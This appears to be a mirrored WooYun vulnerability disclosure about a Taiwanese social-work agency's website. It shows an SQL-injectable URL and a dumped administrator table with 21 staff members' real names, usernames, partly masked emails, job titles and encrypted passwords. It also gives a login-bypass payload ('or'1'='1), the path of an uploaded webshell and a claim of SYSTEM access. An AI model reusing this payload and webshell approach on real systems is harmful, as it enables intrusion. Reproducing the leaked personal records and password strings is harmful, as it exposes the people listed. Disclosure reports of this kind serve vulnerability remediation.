乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
SQL URL:http://**.**.**.**/wcyc/news_detail.aspx?Activity_id=1
Database: wcycTable: admin[21 entries]+----------+----------+---------------------+------------+------------+---------------------+-------------+---------------------+---------------+--------------------------+----------------+-----------------+| Group_ID | Admin_ID | UpdateTime | Admin_Name | Admin_Stop | CreateTime | Update_User | Admin_Email | Admin_Account | Admin_PassWord | Admin_Position | Admin_available |+----------+----------+---------------------+------------+------------+---------------------+-------------+---------------------+---------------+--------------------------+----------------+-----------------+| 1 | 2 | 2012-07-17 11:23:00 | openghost | 正常使用 | 2010-04-20 14:45:00 | 2 | openghost@**.**.**.** | openghost | AhXMAgcob+k= | 助理 | 開啟 || 1 | 9 | 2014-09-18 09:14:00 | 賴秋伶 | 正常使用 | 2014-09-18 09:14:00 | 2 | chunling@**.**.**.** | chunling | hTnKa3RfmqJORyIVugwZUg== | 社會工作員【正式】 | <blank> || 4 | 10 | 2014-09-18 09:15:00 | 蕭惠如 | 正常使用 | 2014-09-18 09:15:00 | 2 | huiju@**.**.**.** | huiju | G6bpZoQc9v0heO4Dhpf5vQ== | 主任督導【正式】 | <blank> || 4 | 11 | 2014-09-18 09:16:00 | 孔昭懿 | 正常使用 | 2014-09-18 09:16:00 | 2 | Kci220@**.**.**.** | Kci220 | 4/froHd+zx0tCHiUW6c79A== | 約聘主任督導員 | <blank> || 4 | 12 | 2014-09-18 09:17:00 | 謝素芬 | 正常使用 | 2014-09-18 09:17:00 | 2 | annane@**.**.**.** | annane | vNCkJf2AdIjHAm8+JIUZnA== | 約聘社工督導 | <blank> || 4 | 13 | 2014-09-18 09:17:00 | 周庭鈺 | 正常使用 | 2014-09-18 09:17:00 | 2 | tychou@**.**.**.** | tychou | dp0MxKuAy0FaLzweUxKUvw== | 約聘社工督導 | <blank> || 4 | 14 | 2014-09-18 09:18:00 | 王君儀 | 正常使用 | 2014-09-18 09:18:00 | 2 | jywang@**.**.**.** | jywang | a9JWaD4zheOj04v9/AWZ9w== | 約聘社工督導 | <blank> || 4 | 15 | 2014-09-18 09:18:00 | 李偉花 | 正常使用 | 2014-09-18 09:18:00 | 2 | annali@**.**.**.** | annali | gxxypvzPmtf/cUBYQT9J1A== | 約聘社工員 | <blank> || 4 | 16 | 2014-09-19 09:03:00 | 卓春嫻 | 正常使用 | 2014-09-18 09:19:00 | 2 | g007cho@**.**.**.** | g007cho | dwSg42YRbf3zDVZMeqsxKg== | 約聘社工員 | <blank> || 4 | 17 | 2014-09-18 09:20:00 | 張仁萍 | 正常使用 | 2014-09-18 09:20:00 | 2 | jenpinc@**.**.**.** | jenpinc | RqGKrG1B+fR+VFXWIY7g5A== | 約聘社工員 | <blank> || 4 | 18 | 2014-09-18 09:20:00 | 黃彥妮 | 正常使用 | 2014-09-18 09:20:00 | 2 | swerynh@**.**.**.** | swerynh | nKSAZHoiWDL0+PWqGD9QvA== | 約聘社工員 | <blank> || 4 | 19 | 2014-09-18 09:21:00 | 李美蓮 | 正常使用 | 2014-09-18 09:21:00 | 2 | g0003@**.**.**.** | g0003 | WsM7qwdt/3qQCVTmL8At9g== | 約聘社工員 | <blank> || 4 | 20 | 2014-09-18 09:22:00 | 林懿君 | 正常使用 | 2014-09-18 09:21:00 | 2 | daging@**.**.**.** | daging | yvRmxpvWgUwvG6SM6eYC7w== | 約聘社工員 | <blank> || 4 | 21 | 2014-09-18 09:22:00 | 林偉傑 | 正常使用 | 2014-09-18 09:22:00 | 2 | mts70227@**.**.**.** | mts70227 | tE5E5p7zdFK5C2Tch5h4Yg== | 約聘社工員 | <blank> || 4 | 22 | 2014-09-18 09:23:00 | 林科蓉 | 正常使用 | 2014-09-18 09:23:00 | 2 | krlin@**.**.**.** | krlin | D2aBusNbon2C6fJl25/SYw== | 約聘社工員 | <blank> || 4 | 23 | 2014-09-18 09:23:00 | 王輝龍 | 正常使用 | 2014-09-18 09:23:00 | 2 | E1208@**.**.**.** | E1208 | opP9LapQNzRJSGwTE4lgFQ== | 約聘人員 | <blank> || 4 | 24 | 2014-09-18 09:24:00 | 楊書豪 | 正常使用 | 2014-09-18 09:24:00 | 2 | Soho6123@**.**.**.** | Soho6123 | B6ipxQsMYog1EBvn39kM/g== | 約僱人員 | <blank> || 4 | 25 | 2014-09-18 09:24:00 | 廖敏惠 | 正常使用 | 2014-09-18 09:24:00 | 2 | mhliao@**.**.**.** | mhliao | TdKS6ta/SLof+ZgupYo/8A== | 約僱人員 | <blank> || 4 | 26 | 2014-09-18 09:25:00 | 宋秋華 | 正常使用 | 2014-09-18 09:25:00 | 2 | chiouhua@**.**.**.** | chiouhua | cLJ4M129u7+kfJSVNrVhAw== | 約聘社工員 | <blank> || 4 | 27 | 2015-08-24 09:26:00 | 鄭立楹 | 正常使用 | 2015-05-08 10:11:00 | 9 | cheng012@**.**.**.** | cheng012 | lge6RNKl8imHQFoqcUjhVg== | 約聘社工員 | <blank> || 4 | 28 | 2015-07-28 14:04:00 | 吳采蓉 | 正常使用 | 2015-07-28 14:04:00 | 9 | tjwu0307@**.**.**.** | tjwu0307 | +TW3QuElMwlcNL/M1Pg8EQ== | 約聘社工員 | <blank> |
密碼加密沒解開發現後臺登入點存在post注入就構造萬能密碼進入
URL:http://**.**.**.**/wcyc/admin/Index.aspxopenghost'or'1'='1 1231231
可上傳webshellhttp://**.**.**.**/wcyc/file/activity/957/54_aa.aspx -7
另注入可直接獲取system許可權
http://**.**.**.**/wcyc/file/activity/957/54_aa.aspx -7
SQL
危害等级:高
漏洞Rank:18
确认时间:2015-11-27 21:14
感謝通報
暂无